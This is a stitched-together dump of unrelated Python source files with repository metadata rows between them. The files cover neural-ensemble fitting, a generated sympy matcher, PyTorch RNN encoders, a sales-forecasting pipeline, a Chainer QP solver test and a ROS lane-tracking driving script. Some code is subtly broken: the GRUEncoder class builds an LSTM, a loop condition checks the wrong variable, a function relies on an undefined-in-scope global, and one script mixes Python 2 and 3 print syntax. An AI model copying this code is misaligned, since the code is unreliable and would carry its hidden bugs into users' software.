X=torch.sub(X.t(),mean_stimuli)
X=X.div(std_stimuli)
return X.t()
def calculate_cost_delta(self,C_summed,current_v):
cost_delta=torch.clamp(C_summed,min=0,max=None)**2/(self.sz[1]*((current_v**2).sum()))-self.lambd
return cost_delta
def mask_cost_delta(self,selected_neurons,cost_delta):
mask=torch.zeros([selected_neurons.size()[0]]).type(torch.cuda.FloatTensor)
mask[selected_neurons==0]=1
mask[selected_neurons!=0]=0
masked_cost_delta=mask*cost_delta
return masked_cost_delta
def sum_C(self,C_summed_unnorm,C,max_delta_neuron):
C_summed_unnorm=C_summed_unnorm+C[:,max_delta_neuron]
return C_summed_unnorm
def sum_v(self, v, max_delta_neuron, X):
current_v=v+X[max_delta_neuron,:]
return current_v
def fit_one_ensemble(self,X):
C=X@X.t()
#A parameter to account for how many top neurons we sample from. It starts from 1,
#because we choose the top neuron when possible, e.g. when we can find an ensemble
#that is larger than min ensemble size. If there is no ensemble with the top neuron
#we increase the number of neurons to sample from.
self.n_neurons_for_sampling=1
top_neurons=self.sorting_for_seed(C)
n=0
min_assembly_size=self.options_dict['min_assembly_size']
max_delta_cost=1000
safety_it=0
#A while loop for trying sampling other neurons if the found ensemble size is smaller
#than threshold.
seed=self.sample_seed_neuron(top_neurons)
n=1
selected_neurons=torch.zeros([self.sz[0]]).type(torch.ByteTensor)
selected_neurons[seed]=1
#Seed current_v
current_v=X[seed,:].flatten()
current_v_unnorm=current_v.clone()
#Fake cost to initiate while loop
max_cost_delta=1000
C_summed_unnorm=0
max_delta_neuron=seed
while max_cost_delta>0:
#Add the x corresponding to the max delta neuron to C_sum. Saves computational
#time.
C_summed_unnorm=self.sum_C(C_summed_unnorm,C,max_delta_neuron)
C_summed=(1./n)*C_summed_unnorm
cost_delta=self.calculate_cost_delta(C_summed,current_v)
#invert the 0's and 1's in the array which stores which neurons have already
#been selected into the assembly to use it as a mask
masked_cost_delta=self.mask_cost_delta(selected_neurons,cost_delta)
max_delta_neuron=masked_cost_delta.argmax()
max_cost_delta=masked_cost_delta.max()
if max_delta_cost>0:
selected_neurons[max_delta_neuron]=1
current_v_unnorm= self.sum_v(current_v_unnorm,max_delta_neuron,X)
n+=1
current_v=(1./n)*current_v_unnorm
current_u=torch.zeros((X.size(0),1))
current_u[selected_neurons,0]=torch.clamp(C_summed[selected_neurons].cpu(),min=0,max=None)/(current_v**2).sum()
current_u=current_u.cpu()
current_v=current_v.cpu()
self.U=torch.cat((self.U,current_u.view(X.size(0),1)),1)
self.V=torch.cat((self.V,current_v.view(1,X.size(1))),0)
return current_u, current_v
def sample_seed_neuron(self,top_neurons):
idx=torch.randint(0,self.n_neurons_for_sampling,size=(1,))
top_neurons=top_neurons[self.sz[0]-(self.n_neurons_for_sampling):]
seed=top_neurons[idx[0]].item()
return seed
def sorting_for_seed(self,C):
'''
This function sorts the similarity matrix C to find neurons that are most correlated
to their nr_neurons_to_av neighbors (we average over the neighbors).
'''
nr_neurons_to_av=self.options_dict['seed_neuron_av_nr']
sorted_similarities,_=C.sort(dim=1)
sorted_similarities=sorted_similarities[:,:-1][:,self.sz[0]-nr_neurons_to_av-1:]
average_similarities=sorted_similarities.mean(dim=1)
top_neurons=average_similarities.argsort()
return top_neurons
def fit_transform(self,X):
'''
X-- shape (neurons, timepoints)
'''
torch.manual_seed(7)
X=torch.cuda.FloatTensor(X)
X=self.zscore(X)
self.sz=X.size()
#Initializes U and V with zeros, later these will be discarded.
self.U=torch.zeros((X.size(0),1))
self.V=torch.zeros((1,X.size(1)))
for iteration in range(0,self.n_ensembles):
current_u, current_v=self.fit_one_ensemble(X)
U_V=current_u.reshape(self.sz[0],1)@current_v.reshape(1,self.sz[1])
X=X.cpu()-U_V
X=X.cuda()
print('ensemble nr', iteration)
cost=torch.mean(torch.mul(X,X))
print('cost',cost)
#After fitting arrays discard the zero initialization rows and columns from U and V.
self.U=self.U[:,1:]
self.V=self.V[1:,:]
return self.U,self.V.t()
| [
"maria.kesa@gmail.com"
] | maria.kesa@gmail.com |
51856a03ef40020ac8c9e0586c08bcf06f66111d | f445450ac693b466ca20b42f1ac82071d32dd991 | /generated_tempdir_2019_09_15_163300/generated_part003471.py | 2cabb575ba5e4c06ee0f115ab7c8fc7bab070e46 | [] | no_license | Upabjojr/rubi_generated | 76e43cbafe70b4e1516fb761cabd9e5257691374 | cd35e9e51722b04fb159ada3d5811d62a423e429 | refs/heads/master | 2020-07-25T17:26:19.227918 | 2019-09-15T15:41:48 | 2019-09-15T15:41:48 | 208,357,412 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,927 | py | from sympy.abc import *
from matchpy.matching.many_to_one import CommutativeMatcher
from matchpy import *
from matchpy.utils import VariableWithCount
from collections import deque
from multiset import Multiset
from sympy.integrals.rubi.constraints import *
from sympy.integrals.rubi.utility_function import *
from sympy.integrals.rubi.rules.miscellaneous_integration import *
from sympy import *
class CommutativeMatcher16359(CommutativeMatcher):
_instance = None
patterns = {
0: (0, Multiset({0: 1}), [
(VariableWithCount('i2.2.1.4.1.0', 1, 1, S(0)), Add)
])
}
subjects = {}
subjects_by_id = {}
bipartite = BipartiteGraph()
associative = Add
max_optional_count = 1
anonymous_patterns = set()
def __init__(self):
self.add_subject(None)
@staticmethod
def get():
if CommutativeMatcher16359._instance is None:
CommutativeMatcher16359._instance = CommutativeMatcher16359()
return CommutativeMatcher16359._instance
@staticmethod
def get_match_iter(subject):
subjects = deque([subject]) if subject is not None else deque()
subst0 = Substitution()
# State 16358
subst1 = Substitution(subst0)
try:
subst1.try_add_variable('i2.2.1.4.1.1.0', S(1))
except ValueError:
pass
else:
pass
# State 16360
if len(subjects) >= 1:
tmp2 = subjects.popleft()
subst2 = Substitution(subst1)
try:
subst2.try_add_variable('i2.2.3.1.1.0', tmp2)
except ValueError:
pass
else:
pass
# State 16361
if len(subjects) == 0:
pass
# 0: f*x
yield 0, subst2
subjects.appendleft(tmp2)
if len(subjects) >= 1 and isinstance(subjects[0], Mul):
tmp4 = subjects.popleft()
associative1 = tmp4
associative_type1 = type(tmp4)
subjects5 = deque(tmp4._args)
matcher = CommutativeMatcher16363.get()
tmp6 = subjects5
subjects5 = []
for s in tmp6:
matcher.add_subject(s)
for pattern_index, subst1 in matcher.match(tmp6, subst0):
pass
if pattern_index == 0:
pass
# State 16364
if len(subjects) == 0:
pass
# 0: f*x
yield 0, subst1
subjects.appendleft(tmp4)
return
yield
from .generated_part003472 import *
from matchpy.matching.many_to_one import CommutativeMatcher
from collections import deque
from matchpy.utils import VariableWithCount
from multiset import Multiset | [
"franz.bonazzi@gmail.com"
] | franz.bonazzi@gmail.com |
c3e9e1cc8cff9dfb3fae569dd6c04fa4f03eb0c9 | b1fbe7460427dbb891d4b1951e43e551e86b1e3b | /arcnlp/torch/nn/encoders/rnn_encoder.py | 650f222a3a14fcc7307c3081e46773c751216295 | [] | no_license | linhx13/arc-nlp | 88a45601e09deb7883ddf4583f6f2f4607fb85d0 | 760cca0d44958fb4011eaa039263575388a858ae | refs/heads/master | 2023-05-04T12:59:21.232168 | 2021-05-18T17:38:28 | 2021-05-18T17:38:28 | 230,442,944 | 1 | 0 | null | 2021-04-17T03:41:42 | 2019-12-27T12:48:02 | Python | UTF-8 | Python | false | false | 3,606 | py | import torch
import torch.nn as nn
from ...nn.utils import get_sequence_lengths
__all__ = ["RNNEncoder", "LSTMEncoder", "GRUEncoder"]
class _RNNBaseEncoder(nn.Module):
def __init__(self, module, return_sequences):
super(_RNNBaseEncoder, self).__init__()
self.module = module
self.return_sequences = return_sequences
@property
def input_dim(self) -> int:
return self.module.input_size
@property
def output_dim(self) -> int:
return self.module.hidden_size * (
2 if self.module.bidirectional else 1
)
def forward(
self,
inputs: torch.Tensor,
mask: torch.BoolTensor = None,
hidden_state: torch.Tensor = None,
) -> torch.Tensor:
if mask is None:
outputs, _ = self.module(inputs, hidden_state)
if self.return_sequences:
return outputs
else:
return outputs[:, -1, :]
total_length = inputs.size(1)
lengths = get_sequence_lengths(mask)
packed_inputs = nn.utils.rnn.pack_padded_sequence(
inputs, lengths.cpu(), batch_first=True, enforce_sorted=False
)
packed_outputs, state = self.module(packed_inputs, hidden_state)
outputs, _ = nn.utils.rnn.pad_packed_sequence(
packed_outputs, batch_first=True, total_length=total_length
)
if self.return_sequences:
return outputs
else:
if isinstance(state, tuple):
state = state[0]
state = state.transpose(0, 1)
num_directions = 2 if self.module.bidirectional else 1
last_state = state[:, -num_directions:, :]
return last_state.contiguous().view([-1, self.output_dim])
class RNNEncoder(_RNNBaseEncoder):
def __init__(
self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
bias: bool = True,
dropout: float = 0.0,
bidirectional: bool = False,
return_sequences: bool = False,
):
module = nn.RNN(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
dropout=dropout,
bidirectional=bidirectional,
)
super().__init__(module, return_sequences)
class LSTMEncoder(_RNNBaseEncoder):
def __init__(
self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
bias: bool = True,
dropout: float = 0.0,
bidirectional: bool = False,
return_sequences: bool = False,
):
module = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
dropout=dropout,
bidirectional=bidirectional,
)
super().__init__(module, return_sequences)
class GRUEncoder(_RNNBaseEncoder):
def __init__(
self,
input_size: int,
hidden_size: int,
num_layers: int = 1,
bias: bool = True,
dropout: float = 0.0,
bidirectional: bool = False,
return_sequences: bool = False,
):
module = nn.LSTM(
input_size=input_size,
hidden_size=hidden_size,
num_layers=num_layers,
bias=bias,
batch_first=True,
dropout=dropout,
bidirectional=bidirectional,
)
super().__init__(module, return_sequences)
| [
"mylhx288@gmail.com"
] | mylhx288@gmail.com |
d8bed30c8a0cf3430c84317e9f16661d9d0d56a9 | 9bace62d46d2b5e143e4bcea76886e0299505b03 | /scripts/pipeline.py | 981949bf17ce07517c5821be16929b930f6aa557 | [] | no_license | rssebudandi/pharmaceutical_sales | 502a33469fdef952beab4ee36bd524d6ca7e441c | 39af6d01ff27889d163d78348c78ac226b1ad639 | refs/heads/main | 2023-06-26T17:00:35.502554 | 2021-07-31T18:26:09 | 2021-07-31T18:26:09 | 390,386,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,729 | py | #Import neccessary libraries
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import pyplot
from sklearn import preprocessing
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.ensemble import RandomForestRegressor
from sklearn.datasets import make_regression
from sklearn.metrics import mean_squared_error
#Read in the different datasets
#Read in store
store=pd.read_csv('../data/store.csv')
#Read in test data
test=store_data=pd.read_csv('../data/test.csv')
#Read in train data
train=store_data=pd.read_csv('../data/train.csv')
#Read in sample submission
sample_submission=store_data=pd.read_csv('../data/sample_submission.csv')
def add_colums(df):
df.Date = pd.to_datetime(df.Date)
df['Day'] = df.Date.dt.day
df['Month'] = df.Date.dt.month
df['Year'] = df.Date.dt.year
df['Weekday'] = df.Date.dt.weekday
df['Month_start'] = df.Date.dt.is_month_start
df['Month_end'] = df.Date.dt.is_month_end
return df
# encode data
def encode_data(df):
month_start_encoder = preprocessing.LabelEncoder()
month_end_encoder = preprocessing.LabelEncoder()
date_encoder = preprocessing.LabelEncoder()
state_hol_encoder = preprocessing.LabelEncoder()
day_encoder = preprocessing.LabelEncoder()
month_encoder = preprocessing.LabelEncoder()
year_encoder = preprocessing.LabelEncoder()
weekday_encoder = preprocessing.LabelEncoder()
open_encoder = preprocessing.LabelEncoder()
df['Month_start'] = month_start_encoder.fit_transform(df['Month_start'])
df['Month_end'] = month_end_encoder.fit_transform(df['Month_end'])
df['Date'] = date_encoder.fit_transform(df['Date'])
df['Day'] = day_encoder.fit_transform(df['Day'])
df['Month'] = month_encoder.fit_transform(df['Month'])
df['Year'] = year_encoder.fit_transform(df['Year'])
df['Weekday'] = weekday_encoder.fit_transform(df['Weekday'])
df['Open'] = open_encoder.fit_transform(df['Open'])
return df
#drop column
def drop_col(df,col):
df=df[df.columns[~df.columns.isin([col])]]
return df
#select feature columns
# select feature columns
def select_features(df):
if 'Sales' in df.columns:
feature_col = ["DayOfWeek", "Date", "Open", "Promo", "SchoolHoliday", "Day", "Month"]
features_X = df[feature_col]
target_y = train_clean["Sales"]
return features_X, target_y
else:
feature_col = ["DayOfWeek", "Date", "Open", "Promo", "SchoolHoliday", "Day", "Month"]
features_X = df[feature_col]
return features_X
if __name__ == '__main__':
train_modified=add_colums(train)
print(train_modified)
train_encoded = encode_data(train_modified)
print(train_encoded)
col = 'StateHoliday'
train_clean=drop_col(train_encoded, col)
print(train_clean)
train_features,target=select_features(train_clean)
print(train_features)
print(target)
#Testing
# test data
test_modified = add_colums(test)
# print(test_modified)
test_encoded = encode_data(test_modified)
# print(train_encoded)
col = 'StateHoliday'
test_clean = drop_col(test_encoded, col)
# print(train_clean)
test_features = select_features(test_clean)
# print(train_features)
test_features
#using a sklearn pipeline
# random forest regressor pipe
piperf = Pipeline([
('scalar', StandardScaler()),
('random_forest', RandomForestRegressor(max_depth=2, random_state=2))
])
piperf.fit(train_features,target)
print(piperf.predict(test_features))
| [
"sebudandi@gmail.com"
] | sebudandi@gmail.com |
0447f7db083947c6b41a4322462d09ba10952137 | c5b1d71856de92083e5a0dd4ea7a414f97e982fe | /experiment_mpc/Projected_Newton_Quadratic_Programming.py | 2c720ca408c904c641bf1d826e69da0f59322467 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | pfnet-research/chainer-differentiable-mpc | ff2c53f78993b9bbc6fb345c98ad757dc9c3ad72 | 05be1c1e06a3ced56e20fa0732c8247a9dc61ea7 | refs/heads/master | 2022-08-31T22:56:23.984781 | 2020-03-04T01:41:31 | 2020-03-04T01:41:31 | 213,283,149 | 12 | 7 | MIT | 2022-08-23T18:05:03 | 2019-10-07T02:55:48 | Python | UTF-8 | Python | false | false | 2,073 | py | # ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.1
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# Experiment: exercise the Projected Newton QP solver (PNQP) on a fixed
# batched box-constrained problem (batch of 2, 4 variables each) and
# compare against the PyTorch reference output quoted in the comment
# cell at the bottom.
import sys
print(sys.path)
# Make the local mpc package importable from this experiment directory.
sys.path.append("../mpc")
from pnqp import PNQP
import chainer
import numpy as np
import matplotlib.pyplot as plt

# Quadratic term H: batch of two 4x4 matrices.
H = np.array([[[ 7.9325,  4.9520,  1.0314,  0.2282],
               [ 4.9520,  8.7746,  1.7916,  3.3622],
               [ 1.0314,  1.7916,  4.2824, -2.5979],
               [ 0.2282,  3.3622, -2.5979,  6.7064]],
              [[ 3.4423, -1.9137, -0.9978, -4.4905],
               [-1.9137,  6.7254,  3.3720,  1.7444],
               [-0.9978,  3.3720,  3.5695, -0.9766],
               [-4.4905,  1.7444, -0.9766, 13.0806]]])
H = chainer.Variable(H)
# Linear term q, one row per batch entry.
q = np.array([[ -0.8277,   8.5116, -12.1597,  17.9497],
              [ -3.5764,  -5.3455,  -3.2465,   4.3960]])
q = chainer.Variable(q)
# Element-wise box constraints: lower <= x <= upper.
lower = np.array([[-0.2843, -0.0063, -0.1808, -0.6669],
                  [-0.1359, -0.3629, -0.2125, -0.0121]])
lower = chainer.Variable(lower)
upper = np.array([[0.1345, 0.0307, 0.0277, 0.9418],
                  [0.6205, 0.2703, 0.4023, 0.2560]])
upper = chainer.Variable(upper)
# No warm start.
x_init = None
solve = PNQP(H,q,lower,upper)
# + {"active": ""}
# Reference values (inputs and expected solution) from the PyTorch
# implementation of the same solver:
# # tensor([[[ 7.9325,  4.9520,  1.0314,  0.2282],
#          [ 4.9520,  8.7746,  1.7916,  3.3622],
#          [ 1.0314,  1.7916,  4.2824, -2.5979],
#          [ 0.2282,  3.3622, -2.5979,  6.7064]],
#
#         [[ 3.4423, -1.9137, -0.9978, -4.4905],
#          [-1.9137,  6.7254,  3.3720,  1.7444],
#          [-0.9978,  3.3720,  3.5695, -0.9766],
#          [-4.4905,  1.7444, -0.9766, 13.0806]]])
# tensor([[ -0.8277,   8.5116, -12.1597,  17.9497],
#         [ -3.5764,  -5.3455,  -3.2465,   4.3960]])
# tensor([[-0.2843, -0.0063, -0.1808, -0.6669],
#         [-0.1359, -0.3629, -0.2125, -0.0121]])
# tensor([[0.1345, 0.0307, 0.0277, 0.9418],
#         [0.6205, 0.2703, 0.4023, 0.2560]])
# None
# tensor([[ 0.1239, -0.0063,  0.0277, -0.6669],
#         [ 0.6205,  0.2703,  0.4023, -0.0121]])
| [
"yoiida333@gmail.com"
] | yoiida333@gmail.com |
3be9815f9c24a461e3836032f901e86a6b7e0623 | c827cac4c99ccfb7299d90325aa0625831d7f4ea | /rl-race-learning/main.py | 1adf04fd28ac35e00a73cc8c97962e90468cb31d | [] | no_license | Alarnti/CarDriving | e67f2b702e4408be9c17d870c36ab1d130e015c8 | 9affe35ea1c6f51f340a1e0ecf13b17d717209b3 | refs/heads/master | 2020-04-02T19:47:21.623621 | 2018-10-25T23:16:19 | 2018-10-25T23:16:19 | 154,746,410 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,697 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import roslib
# roslib.load_manifest('my_package')
import sys
import rospy
import cv2
import math
from std_msgs.msg import String
from geometry_msgs.msg import Pose
from geometry_msgs.msg import Point
from geometry_msgs.msg import Quaternion
from sensor_msgs.msg import Image, CompressedImage
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
from std_msgs.msg import Int16, UInt8
from gradients import get_edges
import tensorflow as tf
from collections import deque
from keras.models import Sequential, load_model
# Path of the saved Q-network weights loaded by image_converter.
MODEL_PATH = 'actionValue.model'
np.set_printoptions(precision=2, suppress=True)
# Initialise this ROS node before any publishers/subscribers are created.
rospy.init_node('image_converter_foobar')
# Number of consecutive frames stacked into one network input.
FRAMES = 4
# Frame counter for the (commented-out) frame-dump debugging code below.
COUNT = 0
from typing import Tuple
from keras.layers import Activation, MaxPooling2D, Dropout, Convolution2D, Flatten, Dense
from keras.models import Sequential, Model
from keras.layers.normalization import BatchNormalization
from keras import optimizers
from keras import regularizers
from keras.layers import merge, Input
from keras import backend as K
from keras.optimizers import Adam
class LaneTracker():
    """Detect left/right lane boundary lines in a small grayscale frame.

    Lines are represented in the general form (A, B, C), meaning
    A*y + B*x + C = 0, as produced by :meth:`coord_line`.  Detected
    boundaries are intersected with a fixed horizontal reference line
    at y = 30.
    """

    def __init__(self):
        # Ring buffer for recent frames (FRAMES is a module-level constant).
        self.frames = deque(maxlen=FRAMES)
        # Horizontal reference line y = 30: (A, B, C) = (0, 1, -30).
        self.main_hor_line = (0, 1, -30)

    def add_frame(self):
        # Placeholder kept for interface compatibility.
        # FIX: the original declared `def add_frame():` without `self`,
        # which raised TypeError on any instance call.
        return 0

    def intersection_of_lines(self, line_one, line_two):
        """Return the (y, x) intersection of two (A, B, C) lines.

        A small epsilon is added to the determinant to avoid division
        by zero for (near-)parallel lines.
        """
        # 0, 1, 2 = A, B, C
        d = (line_one[0] * line_two[1] - line_two[0] * line_one[1]) + 1e-6
        x = - (line_one[2] * line_two[1] - line_two[2] * line_one[1]) / d
        y = - (line_one[0] * line_two[2] - line_two[0] * line_one[2]) / d
        return y, x

    def process_frame(self, frame):
        """Annotate *frame* (float grayscale in [0, 1]) with the reference
        line and the detected right-boundary intersection; returns BGR."""
        edges = cv2.Canny((255 * frame).astype(np.uint8), 100, 200)
        # Mask regions that never contain lane edges (top band, bottom
        # band, and the car hood area).
        edges[:30, :] = 0
        edges[75:, :] = 0
        edges[60:75, 30:70] = 0
        a = self.coord_line(edges)
        l = self.intersection_of_lines(self.main_hor_line, a[0])
        r = self.intersection_of_lines(self.main_hor_line, a[1])
        im_bgr = cv2.cvtColor(frame, cv2.COLOR_GRAY2BGR)
        # Reference line drawn in red.
        img_out = cv2.line(im_bgr, (0, 30), (100, 30), (0, 0, 255), 2)
        # middle - red
        cv2.circle(img_out, (50, 30), 2, (255, 0, 0), -1)
        # right - green
        cv2.circle(img_out, (int(r[1]), int(r[0])), 5, (0, 255, 0), -1)
        # Left-point drawing kept disabled, as in the original:
        # cv2.circle(img_out,(int(l[1]),int(l[0])), 2, (255,255,0), -1)
        return img_out

    def process_frame_(self, frame):
        """Return the (left_line, right_line) fit for an 8-bit frame,
        without drawing anything."""
        edges = cv2.Canny(frame, 100, 200)
        edges[:30, :] = 0
        edges[75:, :] = 0
        edges[60:75, 30:70] = 0
        return self.coord_line(edges)

    def coord_line(self, edges):
        """Scan the edge image and fit one straight line per side.

        Every 5th row (starting below the top ~29%) is scanned from the
        left and from the right for the first edge pixel that has at
        least one 8-connected edge neighbour; the first and last such
        points per side define the returned (A, B, C) coefficients.
        A side with fewer than two points yields (0, 0, 0).
        """
        points_right = []
        points_left = []
        # 8-neighbourhood mask (centre excluded).
        filt = np.array([[1, 1, 1], [1, 0, 1], [1, 1, 1]])
        for i in range(int(len(edges) / 3.5), len(edges), 5):
            found_left = False
            found_right = False
            # Left boundary: first qualifying edge pixel from the left.
            for j in range(1, len(edges[0]) - 1):
                if edges[i, j] > 0:
                    if np.sum(edges[i - 1:i + 2, j - 1:j + 2] * filt) > 0:
                        if j < len(edges[0]) / 2 and not found_left:
                            points_left.append([i, j])
                            found_left = True
                if found_left:
                    break
            # Right boundary: first qualifying edge pixel from the right.
            for j in range(len(edges[0]) - 2, 1, -1):
                if edges[i, j] > 0:
                    if np.sum(edges[i - 1:i + 2, j - 1:j + 2] * filt) > 0:
                        if j > len(edges[0]) / 2 and not found_right:
                            points_right.append([i, j])
                            found_right = True
                if found_right:
                    break
        found_right_line = False
        found_left_line = False
        A_right = 0
        B_right = 0
        C_right = 0
        A_left = 0
        B_left = 0
        C_left = 0
        if len(points_right) > 1:
            # NOTE(review): the original sets `found_right` here instead
            # of `found_right_line`; both flags are unused afterwards,
            # so behaviour is kept unchanged.
            found_right = True
            A_right = points_right[0][0] - points_right[-1][0]
            B_right = points_right[-1][1] - points_right[0][1]
            C_right = points_right[0][1] * points_right[-1][0] - \
                points_right[-1][1] * points_right[0][0]
        if len(points_left) > 1:
            found_left_line = True
            A_left = points_left[0][0] - points_left[-1][0]
            B_left = points_left[-1][1] - points_left[0][1]
            C_left = points_left[0][1] * points_left[-1][0] - \
                points_left[-1][1] * points_left[0][0]
        return (A_left, B_left, C_left), (A_right, B_right, C_right)
# Module-level tracker instance available to the vision pipeline.
tracker = LaneTracker()
# TUple changed
def create_atari_model(input_shape, output_units):
    """Build the dueling Q-network used for steering prediction.

    Architecture (old Keras 1.x functional API): one strided conv,
    max-pooling, then two dense streams -- an advantage head with one
    output per action and a scalar value head -- merged into Q-values
    via Q = A - mean(A) + V.

    Arguments
    ---------
    input_shape:
        Shape of one stacked-frame input, e.g. (height, width, frames).
    output_units:
        Number of discrete actions (Q-value outputs).

    Returns
    -------
    A compiled Keras Model mapping an image stack to Q-values.
    """
    # Cleanup vs. original: the large blocks of commented-out alternative
    # architectures were removed, along with an unused `conv2` layer that
    # was built from conv1 but never connected to the output graph.
    NUM_ACTIONS = output_units
    input_layer = Input(shape=input_shape)
    conv1 = Convolution2D(8, 5, 5, subsample=(2, 2), activation='relu')(input_layer)
    pool = MaxPooling2D(pool_size=(2, 2), padding='same')(conv1)
    flatten = Flatten()(pool)
    # Advantage stream: one value per action.
    fc1 = Dense(128, activation='relu')(flatten)
    advantage = Dense(NUM_ACTIONS)(fc1)
    # Value stream: scalar state value.
    fc2 = Dense(64, activation='relu')(flatten)
    value = Dense(1)(fc2)
    # Dueling merge: Q = A - mean(A) + V.
    # NOTE(review): K.mean(x[0]) reduces over all axes (including the
    # batch axis); a per-sample mean over the action axis may have been
    # intended -- behaviour kept exactly as in the original.
    policy = merge([advantage, value],
                   mode=lambda x: x[0] - K.mean(x[0]) + x[1],
                   output_shape=(NUM_ACTIONS,))
    model = Model(input=[input_layer], output=[policy])
    model.compile(optimizer=Adam(lr=0.0001), loss='mse',
                  metrics=['mean_squared_error'])
    return model
def softmax(x):
    """Return the softmax of *x*.

    The maximum is subtracted before exponentiating for numerical
    stability; the result sums to 1.
    """
    shifted = np.asarray(x) - np.max(x)
    exps = np.exp(shifted)
    return exps / np.sum(exps)
class Filter:
    """Majority-vote filter over the last few integer predictions.

    Predictions are written into a fixed-size ring buffer; the filtered
    prediction is the most frequent value currently in the buffer
    (via bincount/argmax), or 1 before anything has been recorded.
    """

    def __init__(self, length):
        # Ring-buffer capacity.
        self.predictionsMaxLength = length
        self.lastPredictionsArray = np.zeros(self.predictionsMaxLength)
        self.currentPosition = 0
        self.firstlyFilled = False

    def add_prediction(self, prediction):
        """Record one prediction in the ring buffer."""
        # NOTE(review): this marks the buffer "filled" after the first
        # insertion, not after a full wrap-around; the condition looks
        # like it may have been intended as `>=` -- behaviour kept as in
        # the original.
        if not self.firstlyFilled and self.currentPosition + 1 < self.predictionsMaxLength:
            self.firstlyFilled = True
        self.currentPosition = (self.currentPosition + 1) % self.predictionsMaxLength
        self.lastPredictionsArray[self.currentPosition] = prediction

    def get_filtered_prediction(self):
        """Return the majority vote of buffered predictions (1 if empty)."""
        if self.firstlyFilled:
            # FIX: converted the Python-2 `print x` statement to the
            # print() call used everywhere else in this file.
            print(self.lastPredictionsArray.astype(int))
            return np.argmax(np.bincount(self.lastPredictionsArray.astype(int)))
        return 1
class image_converter:
    """ROS glue for the driving policy.

    Subscribes to the compressed camera stream, preprocesses each frame
    into an edge image, stacks the last FRAME_COUNT frames, queries the
    Q-network at a limited rate, and publishes speed/steering commands.

    NOTE(review): this class contains Python-2 `print` statements while
    the rest of the file uses print() calls; they are kept unchanged here.
    """
    def __init__(self):
        # Latched command publishers for the car.
        self.pubSpeed = rospy.Publisher('/manual_control/speed', Int16, queue_size=1, latch=True)
        self.pubSteering = rospy.Publisher('/steering', UInt8, queue_size=1, latch=True)
        # self.model = load_model(MODEL_PATH)
        self.FRAME_COUNT = 4
        self.im_input_shape = (100,100)
        # Rebuild the network (3 outputs = steering classes) and load
        # the trained weights from MODEL_PATH.
        self.model = create_atari_model((self.im_input_shape[0], self.im_input_shape[1], self.FRAME_COUNT),3)
        self.model.load_weights(MODEL_PATH)
        self.model._make_predict_function()
        # Cache the TF graph so predict() works from the subscriber thread.
        self.graph = tf.get_default_graph()
        self.frames = []
        self.index = 0
        self.max_frames = self.FRAME_COUNT
        self.bridge = CvBridge()
        self.image_sub = rospy.Subscriber("/app/camera/rgb/image_color/compressed",CompressedImage,self.callback, queue_size=1)
        self.frame_nums = 0
        # Ring buffer of the last FRAME_COUNT preprocessed frames.
        self.cache = deque(maxlen=self.FRAME_COUNT)
        self.frame_count = 0
        # Majority-vote filter over predictions (its use in callback is
        # currently commented out).
        self.filter = Filter(5)
        self.current_speed = 130
        self.current_steering = 90
        self.last_command_time = rospy.get_time()
        self.prev_command = 1
        self.mask_right = np.ones((480,640))
        # for i in range(0,len(self.mask_right)):
        #     for j in range(0,len(self.mask_right[0])):
        #         if i < 2.5 * j - 25:
        #             self.mask_right[i,j] = 0

    def softmax(self, x):
        """Compute softmax values for each sets of scores in x."""
        e_x = np.exp(x - np.max(x))
        return e_x / e_x.sum(axis=0)

    def add_frame(self, image):
        """Append *image* to the frame cache and rebuild the stacked input."""
        self.cache.append(image)
        # Pad the buffer with copies so np.stack always sees FRAME_COUNT
        # frames, even right after startup.
        while len(self.cache) < self.FRAME_COUNT:
            self.cache.append(image)
        # print len(self.cache)
        self.frames = np.stack(self.cache, axis=2)
        # print 'ads',self.frames.shape
        self.index = (self.index + 1) % 4
        self.frame_nums += 1

    def predict(self, image=None):
        """Run the Q-network on the current frame stack; return the index
        of the most probable action class."""
        with self.graph.as_default():
            x = np.expand_dims(self.frames, axis = 0)
            # print x.shape
            pred = self.model.predict(x)[0]
            softmax = self.softmax(pred)
            print pred
            print softmax
            # print softmax[np.argmax(softmax)]
            # if softmax[np.argmax(softmax)] > 0.30:
            return np.argmax(softmax)
            # else:
            #     return None
            # return np.argmax(pred)

    def callback(self,data):
        """Per-frame pipeline: decode -> resize -> keep bright (lane)
        pixels -> edge image -> stack -> rate-limited predict -> publish."""
        try:
            frame = self.bridge.compressed_imgmsg_to_cv2(data, "bgr8")
            pass
        except CvBridgeError as e:
            print(e)
        # print('AAAAAAAAA')
        self.frame_count += 1
        # frame = cv2.flip(frame, 1)
        frame = cv2.resize(frame, self.im_input_shape)
        frame_hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HLS)
        frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
        # HLS range keeping only very bright pixels (lane markings).
        lower = np.array([0, 175, 0])
        upper = np.array([180,255,255])
        # resized = cv2.resize(frame, self.im_input_shape)
        # Blank the top third of the image (sky / background).
        frame[:int(len(frame)/3),:] = 0
        # frame[int(len(frame)/1.8):, :int(len(frame[0])/5)] = 0
        # frame[:int(len(frame)*3/4), int(len(frame[0])*3/4):] = 0
        mask = cv2.inRange(frame_hsv, lower, upper)
        res = cv2.bitwise_and(frame,frame, mask= mask)
        # res = cv2.bitwise_and(res,res, mask=self.mask_right.astype(np.uint8))
        # kernel = np.ones((7,7))
        # res = cv2.dilate(res,kernel,5)
        resized = res#<cv2.resize(res, self.im_input_shape)
        ret, resized = cv2.threshold(resized,150,255,cv2.THRESH_BINARY)
        # resized[:int(len(resized)/),:] = 0
        edges = get_edges(resized)
